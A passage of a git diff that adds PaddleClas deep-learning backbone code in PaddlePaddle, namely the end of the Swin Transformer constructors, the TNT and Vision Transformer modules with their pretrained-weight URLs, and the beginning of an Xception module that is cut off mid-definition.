depths=[2, 2, 18, 2], + num_heads=[4, 8, 16, 32], + window_size=12, + drop_path_rate=0.5, # NOTE: do not appear in offical code + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_base_patch4_window12_384"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_large_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=192, + depths=[2, 2, 18, 2], + num_heads=[6, 12, 24, 48], + window_size=7, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_large_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_large_patch4_window12_384(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + img_size=384, + embed_dim=192, + depths=[2, 2, 18, 2], + num_heads=[6, 12, 24, 48], + window_size=12, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_large_patch4_window12_384"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/tnt.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/tnt.py new file mode 100644 index 0000000..13e9b5c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/tnt.py @@ -0,0 +1,383 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import math +import numpy as np + +import paddle +import paddle.nn as nn + +from paddle.nn.initializer import TruncatedNormal, Constant + +from ppcls.arch.backbone.base.theseus_layer import Identity +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "TNT_small": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/TNT_small_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() + +trunc_normal_ = TruncatedNormal(std=.02) +zeros_ = Constant(value=0.) +ones_ = Constant(value=1.) + + +def drop_path(x, drop_prob=0., training=False): + """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks). + the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper... + See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... + """ + if drop_prob == 0. or not training: + return x + keep_prob = paddle.to_tensor(1 - drop_prob) + shape = (paddle.shape(x)[0], ) + (1, ) * (x.ndim - 1) + random_tensor = paddle.add(keep_prob, paddle.rand(shape, dtype=x.dtype)) + random_tensor = paddle.floor(random_tensor) # binarize + output = x.divide(keep_prob) * random_tensor + return output + + +class DropPath(nn.Layer): + """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks). + """ + + def __init__(self, drop_prob=None): + super(DropPath, self).__init__() + self.drop_prob = drop_prob + + def forward(self, x): + return drop_path(x, self.drop_prob, self.training) + + +class Mlp(nn.Layer): + def __init__(self, + in_features, + hidden_features=None, + out_features=None, + act_layer=nn.GELU, + drop=0.): + super().__init__() + out_features = out_features or in_features + hidden_features = hidden_features or in_features + self.fc1 = nn.Linear(in_features, hidden_features) + self.act = act_layer() + self.fc2 = nn.Linear(hidden_features, out_features) + self.drop = nn.Dropout(drop) + + def forward(self, x): + x = self.fc1(x) + x = self.act(x) + x = self.drop(x) + x = self.fc2(x) + x = self.drop(x) + return x + + +class Attention(nn.Layer): + def __init__(self, + dim, + hidden_dim, + num_heads=8, + qkv_bias=False, + attn_drop=0., + proj_drop=0.): + super().__init__() + self.hidden_dim = hidden_dim + self.num_heads = num_heads + head_dim = hidden_dim // num_heads + self.head_dim = head_dim + self.scale = head_dim**-0.5 + + self.qk = nn.Linear(dim, hidden_dim * 2, bias_attr=qkv_bias) + self.v = nn.Linear(dim, dim, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + + def forward(self, x): + B, N, C = x.shape + qk = self.qk(x).reshape( + (B, N, 2, self.num_heads, self.head_dim)).transpose( + (2, 0, 3, 1, 4)) + + q, k = qk[0], qk[1] + v = self.v(x).reshape( + (B, N, self.num_heads, x.shape[-1] // self.num_heads)).transpose( + (0, 2, 1, 3)) + + attn = paddle.matmul(q, k.transpose((0, 1, 3, 2))) * self.scale + attn = nn.functional.softmax(attn, axis=-1) + attn = self.attn_drop(attn) + + x = paddle.matmul(attn, v) + x = x.transpose((0, 2, 1, 3)).reshape( + (B, N, x.shape[-1] * x.shape[-3])) + x = self.proj(x) + x = self.proj_drop(x) + return x + + +class Block(nn.Layer): + def __init__(self, + dim, + in_dim, + num_pixel, + num_heads=12, + in_num_head=4, + mlp_ratio=4., + qkv_bias=False, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm): + super().__init__() + # Inner transformer + self.norm_in = norm_layer(in_dim) + self.attn_in = Attention( + in_dim, + in_dim, + num_heads=in_num_head, + qkv_bias=qkv_bias, + attn_drop=attn_drop, + proj_drop=drop) + + self.norm_mlp_in = norm_layer(in_dim) + self.mlp_in = Mlp(in_features=in_dim, + hidden_features=int(in_dim * 4), + out_features=in_dim, + act_layer=act_layer, + drop=drop) + + self.norm1_proj = norm_layer(in_dim) + self.proj = nn.Linear(in_dim * num_pixel, dim) + # Outer transformer + self.norm_out = norm_layer(dim) + self.attn_out = Attention( + dim, + dim, + num_heads=num_heads, + qkv_bias=qkv_bias, + attn_drop=attn_drop, + proj_drop=drop) + + self.drop_path = DropPath(drop_path) if drop_path > 0. else Identity() + + self.norm_mlp = norm_layer(dim) + self.mlp = Mlp(in_features=dim, + hidden_features=int(dim * mlp_ratio), + out_features=dim, + act_layer=act_layer, + drop=drop) + + def forward(self, pixel_embed, patch_embed): + # inner + pixel_embed = paddle.add( + pixel_embed, + self.drop_path(self.attn_in(self.norm_in(pixel_embed)))) + pixel_embed = paddle.add( + pixel_embed, + self.drop_path(self.mlp_in(self.norm_mlp_in(pixel_embed)))) + # outer + B, N, C = patch_embed.shape + norm1_proj = self.norm1_proj(pixel_embed) + norm1_proj = norm1_proj.reshape( + (B, N - 1, norm1_proj.shape[1] * norm1_proj.shape[2])) + patch_embed[:, 1:] = paddle.add(patch_embed[:, 1:], + self.proj(norm1_proj)) + patch_embed = paddle.add( + patch_embed, + self.drop_path(self.attn_out(self.norm_out(patch_embed)))) + patch_embed = paddle.add( + patch_embed, self.drop_path(self.mlp(self.norm_mlp(patch_embed)))) + return pixel_embed, patch_embed + + +class PixelEmbed(nn.Layer): + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + in_dim=48, + stride=4): + super().__init__() + num_patches = (img_size // patch_size)**2 + self.img_size = img_size + self.num_patches = num_patches + self.in_dim = in_dim + new_patch_size = math.ceil(patch_size / stride) + self.new_patch_size = new_patch_size + + self.proj = nn.Conv2D( + in_chans, self.in_dim, kernel_size=7, padding=3, stride=stride) + + def forward(self, x, pixel_pos): + B, C, H, W = x.shape + assert H == self.img_size and W == self.img_size, f"Input image size ({H}*{W}) doesn't match model ({self.img_size}*{self.img_size})." + + x = self.proj(x) + x = nn.functional.unfold(x, self.new_patch_size, self.new_patch_size) + x = x.transpose((0, 2, 1)).reshape( + (-1, self.in_dim, self.new_patch_size, self.new_patch_size)) + x = x + pixel_pos + x = x.reshape((-1, self.in_dim, self.new_patch_size * + self.new_patch_size)).transpose((0, 2, 1)) + return x + + +class TNT(nn.Layer): + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + embed_dim=768, + in_dim=48, + depth=12, + num_heads=12, + in_num_head=4, + mlp_ratio=4., + qkv_bias=False, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer=nn.LayerNorm, + first_stride=4, + class_num=1000): + super().__init__() + self.class_num = class_num + # num_features for consistency with other models + self.num_features = self.embed_dim = embed_dim + + self.pixel_embed = PixelEmbed( + img_size=img_size, + patch_size=patch_size, + in_chans=in_chans, + in_dim=in_dim, + stride=first_stride) + num_patches = self.pixel_embed.num_patches + self.num_patches = num_patches + new_patch_size = self.pixel_embed.new_patch_size + num_pixel = new_patch_size**2 + + self.norm1_proj = norm_layer(num_pixel * in_dim) + self.proj = nn.Linear(num_pixel * in_dim, embed_dim) + self.norm2_proj = norm_layer(embed_dim) + + self.cls_token = self.create_parameter( + shape=(1, 1, embed_dim), default_initializer=zeros_) + self.add_parameter("cls_token", self.cls_token) + + self.patch_pos = self.create_parameter( + shape=(1, num_patches + 1, embed_dim), default_initializer=zeros_) + self.add_parameter("patch_pos", self.patch_pos) + + self.pixel_pos = self.create_parameter( + shape=(1, in_dim, new_patch_size, new_patch_size), + default_initializer=zeros_) + self.add_parameter("pixel_pos", self.pixel_pos) + + self.pos_drop = nn.Dropout(p=drop_rate) + + # stochastic depth decay rule + dpr = np.linspace(0, drop_path_rate, depth) + + blocks = [] + for i in range(depth): + blocks.append( + Block( + dim=embed_dim, + in_dim=in_dim, + num_pixel=num_pixel, + num_heads=num_heads, + in_num_head=in_num_head, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[i], + norm_layer=norm_layer)) + self.blocks = nn.LayerList(blocks) + self.norm = norm_layer(embed_dim) + + if class_num > 0: + self.head = nn.Linear(embed_dim, class_num) + + trunc_normal_(self.cls_token) + trunc_normal_(self.patch_pos) + trunc_normal_(self.pixel_pos) + self.apply(self._init_weights) + + def _init_weights(self, m): + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + + def forward_features(self, x): + B = paddle.shape(x)[0] + pixel_embed = self.pixel_embed(x, self.pixel_pos) + + patch_embed = self.norm2_proj( + self.proj( + self.norm1_proj( + pixel_embed.reshape((-1, self.num_patches, pixel_embed. + shape[-1] * pixel_embed.shape[-2]))))) + patch_embed = paddle.concat( + (self.cls_token.expand((B, -1, -1)), patch_embed), axis=1) + patch_embed = patch_embed + self.patch_pos + patch_embed = self.pos_drop(patch_embed) + + for blk in self.blocks: + pixel_embed, patch_embed = blk(pixel_embed, patch_embed) + + patch_embed = self.norm(patch_embed) + return patch_embed[:, 0] + + def forward(self, x): + x = self.forward_features(x) + + if self.class_num > 0: + x = self.head(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def TNT_small(pretrained=False, **kwargs): + model = TNT(patch_size=16, + embed_dim=384, + in_dim=24, + depth=12, + num_heads=6, + in_num_head=4, + qkv_bias=False, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["TNT_small"]) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/vision_transformer.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/vision_transformer.py new file mode 100644 index 0000000..8cfa559 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/vision_transformer.py @@ -0,0 +1,511 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from collections import Callable + +import numpy as np +import paddle +import paddle.nn as nn +from paddle.nn.initializer import TruncatedNormal, Constant, Normal + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ViT_small_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_small_patch16_224_pretrained.pdparams", + "ViT_base_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_base_patch16_224_pretrained.pdparams", + "ViT_base_patch16_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_base_patch16_384_pretrained.pdparams", + "ViT_base_patch32_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_base_patch32_384_pretrained.pdparams", + "ViT_large_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_large_patch16_224_pretrained.pdparams", + "ViT_large_patch16_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_large_patch16_384_pretrained.pdparams", + "ViT_large_patch32_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_large_patch32_384_pretrained.pdparams", + "ViT_huge_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_huge_patch16_224_pretrained.pdparams", + "ViT_huge_patch32_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_huge_patch32_384_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + +trunc_normal_ = TruncatedNormal(std=.02) +normal_ = Normal +zeros_ = Constant(value=0.) +ones_ = Constant(value=1.) + + +def to_2tuple(x): + return tuple([x] * 2) + + +def drop_path(x, drop_prob=0., training=False): + """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks). + the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper... + See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... + """ + if drop_prob == 0. or not training: + return x + keep_prob = paddle.to_tensor(1 - drop_prob) + shape = (paddle.shape(x)[0], ) + (1, ) * (x.ndim - 1) + random_tensor = keep_prob + paddle.rand(shape, dtype=x.dtype) + random_tensor = paddle.floor(random_tensor) # binarize + output = x.divide(keep_prob) * random_tensor + return output + + +class DropPath(nn.Layer): + """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks). + """ + + def __init__(self, drop_prob=None): + super(DropPath, self).__init__() + self.drop_prob = drop_prob + + def forward(self, x): + return drop_path(x, self.drop_prob, self.training) + + +class Identity(nn.Layer): + def __init__(self): + super(Identity, self).__init__() + + def forward(self, input): + return input + + +class Mlp(nn.Layer): + def __init__(self, + in_features, + hidden_features=None, + out_features=None, + act_layer=nn.GELU, + drop=0.): + super().__init__() + out_features = out_features or in_features + hidden_features = hidden_features or in_features + self.fc1 = nn.Linear(in_features, hidden_features) + self.act = act_layer() + self.fc2 = nn.Linear(hidden_features, out_features) + self.drop = nn.Dropout(drop) + + def forward(self, x): + x = self.fc1(x) + x = self.act(x) + x = self.drop(x) + x = self.fc2(x) + x = self.drop(x) + return x + + +class Attention(nn.Layer): + def __init__(self, + dim, + num_heads=8, + qkv_bias=False, + qk_scale=None, + attn_drop=0., + proj_drop=0.): + super().__init__() + self.num_heads = num_heads + head_dim = dim // num_heads + self.scale = qk_scale or head_dim**-0.5 + + self.qkv = nn.Linear(dim, dim * 3, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + + def forward(self, x): + # B= paddle.shape(x)[0] + N, C = x.shape[1:] + qkv = self.qkv(x).reshape((-1, N, 3, self.num_heads, C // + self.num_heads)).transpose((2, 0, 3, 1, 4)) + q, k, v = qkv[0], qkv[1], qkv[2] + + attn = (q.matmul(k.transpose((0, 1, 3, 2)))) * self.scale + attn = nn.functional.softmax(attn, axis=-1) + attn = self.attn_drop(attn) + + x = (attn.matmul(v)).transpose((0, 2, 1, 3)).reshape((-1, N, C)) + x = self.proj(x) + x = self.proj_drop(x) + return x + + +class Block(nn.Layer): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer='nn.LayerNorm', + epsilon=1e-5): + super().__init__() + if isinstance(norm_layer, str): + self.norm1 = eval(norm_layer)(dim, epsilon=epsilon) + elif isinstance(norm_layer, Callable): + self.norm1 = norm_layer(dim) + else: + raise TypeError( + "The norm_layer must be str or paddle.nn.layer.Layer class") + self.attn = Attention( + dim, + num_heads=num_heads, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + attn_drop=attn_drop, + proj_drop=drop) + # NOTE: drop path for stochastic depth, we shall see if this is better than dropout here + self.drop_path = DropPath(drop_path) if drop_path > 0. else Identity() + if isinstance(norm_layer, str): + self.norm2 = eval(norm_layer)(dim, epsilon=epsilon) + elif isinstance(norm_layer, Callable): + self.norm2 = norm_layer(dim) + else: + raise TypeError( + "The norm_layer must be str or paddle.nn.layer.Layer class") + mlp_hidden_dim = int(dim * mlp_ratio) + self.mlp = Mlp(in_features=dim, + hidden_features=mlp_hidden_dim, + act_layer=act_layer, + drop=drop) + + def forward(self, x): + x = x + self.drop_path(self.attn(self.norm1(x))) + x = x + self.drop_path(self.mlp(self.norm2(x))) + return x + + +class PatchEmbed(nn.Layer): + """ Image to Patch Embedding + """ + + def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768): + super().__init__() + img_size = to_2tuple(img_size) + patch_size = to_2tuple(patch_size) + num_patches = (img_size[1] // patch_size[1]) * \ + (img_size[0] // patch_size[0]) + self.img_size = img_size + self.patch_size = patch_size + self.num_patches = num_patches + + self.proj = nn.Conv2D( + in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) + + def forward(self, x): + B, C, H, W = x.shape + assert H == self.img_size[0] and W == self.img_size[1], \ + f"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]})." + + x = self.proj(x).flatten(2).transpose((0, 2, 1)) + return x + + +class VisionTransformer(nn.Layer): + """ Vision Transformer with support for patch input + """ + + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + class_num=1000, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=False, + qk_scale=None, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer='nn.LayerNorm', + epsilon=1e-5, + **kwargs): + super().__init__() + self.class_num = class_num + + self.num_features = self.embed_dim = embed_dim + + self.patch_embed = PatchEmbed( + img_size=img_size, + patch_size=patch_size, + in_chans=in_chans, + embed_dim=embed_dim) + num_patches = self.patch_embed.num_patches + + self.pos_embed = self.create_parameter( + shape=(1, num_patches + 1, embed_dim), default_initializer=zeros_) + self.add_parameter("pos_embed", self.pos_embed) + self.cls_token = self.create_parameter( + shape=(1, 1, embed_dim), default_initializer=zeros_) + self.add_parameter("cls_token", self.cls_token) + self.pos_drop = nn.Dropout(p=drop_rate) + + dpr = np.linspace(0, drop_path_rate, depth) + + self.blocks = nn.LayerList([ + Block( + dim=embed_dim, + num_heads=num_heads, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[i], + norm_layer=norm_layer, + epsilon=epsilon) for i in range(depth) + ]) + + self.norm = eval(norm_layer)(embed_dim, epsilon=epsilon) + + # Classifier head + self.head = nn.Linear(embed_dim, + class_num) if class_num > 0 else Identity() + + trunc_normal_(self.pos_embed) + trunc_normal_(self.cls_token) + self.apply(self._init_weights) + + def _init_weights(self, m): + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + + def forward_features(self, x): + # B = x.shape[0] + B = paddle.shape(x)[0] + x = self.patch_embed(x) + cls_tokens = self.cls_token.expand((B, -1, -1)) + x = paddle.concat((cls_tokens, x), axis=1) + x = x + self.pos_embed + x = self.pos_drop(x) + for blk in self.blocks: + x = blk(x) + x = self.norm(x) + return x[:, 0] + + def forward(self, x): + x = self.forward_features(x) + x = self.head(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ViT_small_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=768, + depth=8, + num_heads=8, + mlp_ratio=3, + qk_scale=768**-0.5, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_small_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_base_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_base_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_base_patch16_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_base_patch16_384"], + use_ssld=use_ssld) + return model + + +def ViT_base_patch32_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=32, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_base_patch32_384"], + use_ssld=use_ssld) + return model + + +def ViT_large_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=1024, + depth=24, + num_heads=16, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_large_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_large_patch16_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=16, + embed_dim=1024, + depth=24, + num_heads=16, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_large_patch16_384"], + use_ssld=use_ssld) + return model + + +def ViT_large_patch32_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=32, + embed_dim=1024, + depth=24, + num_heads=16, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_large_patch32_384"], + use_ssld=use_ssld) + return model + + +def ViT_huge_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=1280, + depth=32, + num_heads=16, + mlp_ratio=4, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_huge_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_huge_patch32_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=32, + embed_dim=1280, + depth=32, + num_heads=16, + mlp_ratio=4, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_huge_patch32_384"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception.py new file mode 100644 index 0000000..2b84378 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception.py @@ -0,0 +1,377 @@ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math +import sys + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "Xception41": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception41_pretrained.pdparams", + "Xception65": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception65_pretrained.pdparams", + "Xception71": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception71_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + bn_name = "bn_" + name + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + "_scale"), + bias_attr=ParamAttr(name=bn_name + "_offset"), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class SeparableConv(nn.Layer): + def __init__(self, input_channels, output_channels, stride=1, name=None): + super(SeparableConv, self).__init__() + + self._pointwise_conv = ConvBNLayer( + input_channels, output_channels, 1, name=name + "_sep") + self._depthwise_conv = ConvBNLayer( + output_channels, + output_channels, + 3, + stride=stride, + groups=output_channels, + name=name + "_dw") + + def forward(self, inputs): + x = self._pointwise_conv(inputs) + x = self._depthwise_conv(x) + return x + + +class EntryFlowBottleneckBlock(nn.Layer): + def __init__(self, + input_channels, + output_channels, + stride=2, + name=None, + relu_first=False): + super(EntryFlowBottleneckBlock, self).__init__() + self.relu_first = relu_first + + self._short = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=1, + stride=stride, + padding=0, + weight_attr=ParamAttr(name + "_branch1_weights"), + bias_attr=False) + self._conv1 = SeparableConv( + input_channels, + output_channels, + stride=1, + name=name + "_branch2a_weights") + self._conv2 = SeparableConv( + output_channels, + output_channels, + stride=1, + name=name + "_branch2b_weights") + self._pool = MaxPool2D(kernel_size=3, stride=stride, padding=1) + + def forward(self, inputs): + conv0 = inputs + short = self._short(inputs) + if self.relu_first: + conv0 = F.relu(conv0) + conv1 = self._conv1(conv0) + conv2 = F.relu(conv1) + conv2 = self._conv2(conv2) + pool = self._pool(conv2) + return paddle.add(x=short, y=pool) + + +class EntryFlow(nn.Layer): + def __init__(self, block_num=3): + super(EntryFlow, self).__init__() + + name = "entry_flow" + self.block_num = block_num + self._conv1 = ConvBNLayer( + 3, 32, 3, stride=2, act="relu", name=name + "_conv1") + self._conv2 = ConvBNLayer(32, 64, 3, act="relu", name=name + "_conv2") + if block_num == 3: + self._conv_0 = EntryFlowBottleneckBlock( + 64, 128, stride=2, name=name + "_0", relu_first=False) + self._conv_1 = EntryFlowBottleneckBlock( + 128, 256, stride=2, name=name + "_1", relu_first=True) + self._conv_2 = EntryFlowBottleneckBlock( + 256, 728, stride=2, name=name + "_2", relu_first=True) + elif block_num == 5: + self._conv_0 = EntryFlowBottleneckBlock( + 64, 128, stride=2, name=name + "_0", relu_first=False) + self._conv_1 = EntryFlowBottleneckBlock( + 128, 256, stride=1, name=name + "_1", relu_first=True) + self._conv_2 = EntryFlowBottleneckBlock( + 256, 256, stride=2, name=name + "_2", relu_first=True) + self._conv_3 = EntryFlowBottleneckBlock( + 256, 728, stride=1, name=name + "_3", relu_first=True) + self._conv_4 = EntryFlowBottleneckBlock( + 728, 728, stride=2, name=name + "_4", relu_first=True) + else: + sys.exit(-1) + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + + if self.block_num == 3: + x = self._conv_0(x) + x = self._conv_1(x) + x = self._conv_2(x) + elif self.block_num == 5: + x = self._conv_0(x) + x = self._conv_1(x) + x = self._conv_2(x) + x = self._conv_3(x) + x = self._conv_4(x) + return x + + +class MiddleFlowBottleneckBlock(nn.Layer): + def __init__(self, input_channels, output_channels, name): + super(MiddleFlowBottleneckBlock, self).__init__() + + self._conv_0 = SeparableConv( + input_channels, + output_channels, + stride=1, + name=name + "_branch2a_weights") + self._conv_1 = SeparableConv( + output_channels, + output_channels, + stride=1, + name=name + "_branch2b_weights") + self._conv_2 = SeparableConv( + output_channels, + output_channels, + stride=1, + name=name + "_branch2c_weights") + + def forward(self, inputs): + conv0 = F.relu(inputs) + conv0 = self._conv_0(conv0) + conv1 = F.relu(conv0) + conv1 = self._conv_1(conv1) + conv2 = F.relu(conv1) + conv2 = self._conv_2(conv2) + return paddle.add(x=inputs, y=conv2) + + +class MiddleFlow(nn.Layer): + def __init__(self, block_num=8): + super(MiddleFlow, self).__init__() + + self.block_num = block_num + self._conv_0 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_0") + self._conv_1 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_1") + self._conv_2 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_2") + self._conv_3 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_3") + self._conv_4 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_4") + self._conv_5 = MiddleFlowBottleneckBlock( + 728, 728, 